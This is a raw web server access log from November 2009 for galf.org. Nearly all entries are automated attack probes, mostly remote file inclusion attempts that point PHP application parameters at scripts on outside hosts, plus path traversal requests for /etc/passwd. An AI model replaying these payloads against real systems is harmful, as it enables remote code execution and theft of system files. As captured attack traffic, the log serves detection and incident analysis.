211.189.18.242 - - [08/Nov/2009:20:36:20 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:20:38:01 -0800] "GET /logs/access_090518.log%20/?sourcedir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:20:38:33 -0800] "GET /logs/access_090928.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:20:38:40 -0800] "GET /logs/access_090907.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:42:17 -0800] "GET /logs/access_090504.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
88.131.106.16 - - [08/Nov/2009:20:43:55 -0800] "GET /?D=D HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:20:43:56 -0800] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:20:43:56 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:20:43:56 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
88.131.106.16 - - [08/Nov/2009:20:44:01 -0800] "GET /?M=D HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [08/Nov/2009:20:44:08 -0800] "GET /?S=D HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:44:11 -0800] "GET /logs/access_090601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:44:42 -0800] "GET /logs/access_090323.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:20:48:56 -0800] "GET /logs/access_090504.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:20:49:03 -0800] "GET /logs/access_090525.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:20:52:36 -0800] "GET /logs/access.log//?_zb_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.79.54.195 - - [08/Nov/2009:20:52:36 -0800] "GET /?_zb_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
94.79.54.195 - - [08/Nov/2009:20:52:36 -0800] "GET /logs//?_zb_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
65.55.106.158 - - [08/Nov/2009:20:53:20 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:53:41 -0800] "GET /logs/access_090406.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:53:44 -0800] "GET /errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:53:45 -0800] "GET /logs/access_090629.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:53:45 -0800] "GET /errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:53:45 -0800] "GET /logs/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:54:31 -0800] "GET /logs/access_090907.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
88.84.148.109 - - [08/Nov/2009:20:54:55 -0800] "GET /?pag=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
88.84.148.109 - - [08/Nov/2009:20:54:55 -0800] "GET /?pag=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
65.55.106.158 - - [08/Nov/2009:20:54:56 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:54:57 -0800] "GET /logs/access_090420.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:56:00 -0800] "GET /logs/access_090525.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:56:40 -0800] "GET /logs/access_090511.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:56:53 -0800] "GET /logs/access_090629.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:56:53 -0800] "GET /errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:56:54 -0800] "GET /logs/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:57:04 -0800] "GET /logs/access_090427.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:57:16 -0800] "GET /logs/access_090907.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:57:20 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:57:23 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:57:25 -0800] "GET /logs/access_090316.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:57:34 -0800] "GET /logs/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:57:34 -0800] "GET /errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:57:59 -0800] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:58:01 -0800] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:58:06 -0800] "GET /logs/access_090817.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.0" 404 - "-" "libwww-perl/5.812" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:58:10 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:58:19 -0800] "GET /logs/access_090824.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:20:58:31 -0800] "GET /errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:58:52 -0800] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.84.148.109 - - [08/Nov/2009:20:59:26 -0800] "GET /?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
88.84.148.109 - - [08/Nov/2009:20:59:27 -0800] "GET /?p=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:59:42 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [08/Nov/2009:20:59:43 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [08/Nov/2009:21:00:02 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
199.120.90.223 - - [08/Nov/2009:21:01:41 -0800] "GET /logs/scripts.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:21:02:49 -0800] "GET /logs/access_090921.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:21:12:03 -0800] "GET /logs/access_090727.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:21:12:05 -0800] "GET /logs/access_090601.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [08/Nov/2009:21:12:05 -0800] "GET /logs/access_090309.log/errors.php?error=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:21:13:01 -0800] "GET /AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:21:13:01 -0800] "GET /logs//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:21:13:01 -0800] "GET /logs/access_090427.log%20%20//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:21:13:14 -0800] "GET /logs/access_090803.log%20%20//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:13:35 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:13:35 -0800] "GET /logs/access_090316.log%20%20/convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:13:35 -0800] "GET /convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:21:15:48 -0800] "GET /logs/access_090810.log///?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:21:15:48 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:21:15:48 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:21:16:08 -0800] "GET /logs/access_090413.log///?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:16:29 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:16:29 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:16:29 -0800] "GET /logs/access_090810.log///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:16:32 -0800] "GET /logs/access_090810.log///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:16:32 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:16:32 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:16:48 -0800] "GET /logs/access_090413.log///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:16:50 -0800] "GET /logs/access_090413.log///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:21:19:04 -0800] "GET /logs/access_090413.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:21:19:09 -0800] "GET /logs/access_090518.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:19:46 -0800] "GET /logs/access_090413.log%20%20///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:19:46 -0800] "GET /logs/access_090518.log%20%20///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:19:49 -0800] "GET /logs/access_090413.log%20%20///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:19:49 -0800] "GET /logs/access_090518.log%20%20///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:20:14 -0800] "GET /logs/access_090504.log//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:20:14 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:20:14 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:20:54 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:20:55 -0800] "GET /logs/access_090504.log//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:20:55 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:20:59 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:20:59 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:20:59 -0800] "GET /logs/access_090504.log%20%20//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:21:20 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:21:20 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:21:20 -0800] "GET /logs/access_090504.log//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:21:41 -0800] "GET /logs/access_090518.log%20%20//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:21:50 -0800] "GET /logs/access_090518.log//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:22:53 -0800] "GET /logs/access_090511.log//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:21:22:56 -0800] "GET /logs/access_090427.log//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:21:23:01 -0800] "GET /logs/access_090803.log//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:21:23:49 -0800] "GET /logs//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:21:23:49 -0800] "GET /AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:21:23:49 -0800] "GET /logs/access_090427.log//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:21:24:03 -0800] "GET /logs/access_090803.log//AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:24:37 -0800] "GET /logs/access_090316.log/convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:25:03 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.17 - - [08/Nov/2009:21:25:03 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.17 - - [08/Nov/2009:21:25:03 -0800] "GET /logs/access.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.17 - - [08/Nov/2009:21:25:03 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.17 - - [08/Nov/2009:21:25:11 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.17 - - [08/Nov/2009:21:25:11 -0800] "GET /logs/access.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.25.94.14 - - [08/Nov/2009:21:25:18 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:21:25:19 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:21:25:19 -0800] "GET /logs/access_090720.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:21:26:57 -0800] "GET /logs/access_090914.log/convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:21:27:41 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:21:27:41 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:21:27:41 -0800] "GET /logs/access_090810.log//modules/vwar/admin/admin.php?vwar_root=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:28:12 -0800] "GET /logs///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:28:12 -0800] "GET //skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:28:12 -0800] "GET /logs/access.log%20%20///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:28:17 -0800] "GET //skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:28:17 -0800] "GET /logs///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:21:28:17 -0800] "GET /logs/access.log%20%20///skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:21:29:06 -0800] "GET /logs/access_090622.log//include/mail.inc.php?skin_board_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
